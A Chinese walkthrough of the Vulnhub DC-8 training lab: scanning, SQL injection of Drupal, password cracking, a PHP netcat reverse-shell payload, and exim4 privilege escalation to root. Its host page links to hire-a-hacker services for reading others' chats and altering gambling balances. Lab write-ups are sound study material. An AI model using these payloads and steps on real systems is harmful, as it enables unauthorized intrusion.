Vulnhub靶机DC系列

访客4年前 (2021-04-11)黑客资讯856

0x0：靶场介绍

靶场名称： DC: 8

靶场发布时间：2019-9-8

靶场地址：https://www.vulnhub.com/entry/dc-8,367/

靶场描述：

DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.

The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.

The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.

You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

1x0：环境搭建

VMware虚拟机(桥接模式)

2x0：靶机渗透

获取靶机的IP

nmap -sn 192.168.3.0/24

1610932905_6004e2a99c64fd5dca9fe.png!small?1610932905572

使用nmap来查看靶机的端口信息和系统信息等等

1610932982_6004e2f6420bf099e30aa.png!small?1610932982277

首先去查看80端口的web服务还是Drupal

1610932941_6004e2cda7198369e87b0.png!small?1610932941582

提示不用爆破破解，使用dirb扫描一下目录

1610933192_6004e3c81f9d669e08592.png!small?1610933192663

存在robots.txt文件

1610933204_6004e3d4ea481403c23ae.png!small?1610933204864

登录地址：

1610933171_6004e3b308d388a76db7b.png!small?1610933170881

版本大致的判断：

1610933281_6004e42109cab2fa66352.png!small?1610933280966

这三个页面url中存在参数sqlmap去尝试一下

1610933371_6004e47ba28fba2b94f45.png!small?1610933371531

sqlmap确定存在sql注入

1610933534_6004e51e88de6ea8f747c.png!small?1610933534475

读取一下数据

1610933870_6004e66e47b90263ce84f.png!small?1610933870181

drupal的密码是特殊加密的需要爆破破解，使用john

john pwd --wordlist=/usr/share/wordlists/rockyou.txt

1610934352_6004e8503a72bdbca18bd.png!small?1610934352156

john/turtle 登录页面

1610934422_6004e896559c8022ef767.png!small?1610934422281

3x0：后台篇

登录后需要获取到shell

在页面中发现可以直接执行php语句

1610934573_6004e92d54bfb45c0a5ef.png!small?1610934573270

写入shell

<?php
system("nc -e /bin/bash 192.168.3.20 1234");
 ?>

反弹到kali中随便提交数据

1610934713_6004e9b9875cd19a78f62.png!small?1610934713390

反弹成功

1610934731_6004e9cbe4ba1f6a6b0a0.png!small?1610934731855

4x0：提权篇

切换shell

1610934786_6004ea02a5770f6ad668f.png!small?1610934786572

查看一下用户有那些

1610934824_6004ea28a6bccdd39360d.png!small?1610934824603

在看看有没有内核提权

1610934890_6004ea6a9c71ef96b71dd.png!small

find / -perm -u=s -type f 2>/dev/null 查看具有root权限的命令

1610934871_6004ea577e9c65193a484.png!small?1610934871427

查看一下exim4的版本又没有漏洞

exim4 --version

1610935041_6004eb01c5738f2128f1e.png!small?1610935041688

https://www.exploit-db.com/exploits/46996找到一个可以使用的exp

下载exp，上传到靶机中并赋予权限

1610935196_6004eb9c920422202b768.png!small?1610935196484 使用过程中报错了

1610935530_6004ecead2f3eed49098c.png!small?1610935530748

需要对exp脚本执行编码

vim 46996.sh

:set ff=unix

:wq

在重新上传到靶机中提权(改完还是报错)，直接复制代码在靶机中创建文件填写

1610935811_6004ee03815148ea2bd90.png!small?1610935811480

执行成功。

1610935909_6004ee6524c44a877269a.png!small?1610935909386

获取到root权限

5x0：flag获取

1610935981_6004eead3c9ffb345eae1.png!small?1610935981183

标签: Vulnhub靶机DC系列

返回列表

上一篇：微信怎么设置不加好友也能看到对方聊天记录

下一篇：怎么进北京商务陪伴儿群【鲜于秋】

找黑客平台

Vulnhub靶机DC系列

0x0：靶场介绍

1x0：环境搭建

2x0：靶机渗透

3x0：后台篇

4x0：提权篇

5x0：flag获取

相关文章

电脑看视频黑屏

伴游多赚钱-【孔怜云】

学信网学籍查询,找黑客恢复微信聊天记录,黑客哪里找

黑客更换充值账号（黑客改赌博充值金额）

浪涌测试(浪涌测试原理与功能)

房产知识：办产权的时候需要交多少钱需要交纳

Copyright Your WebSite.Some Rights Reserved.

Hacker by Hacker.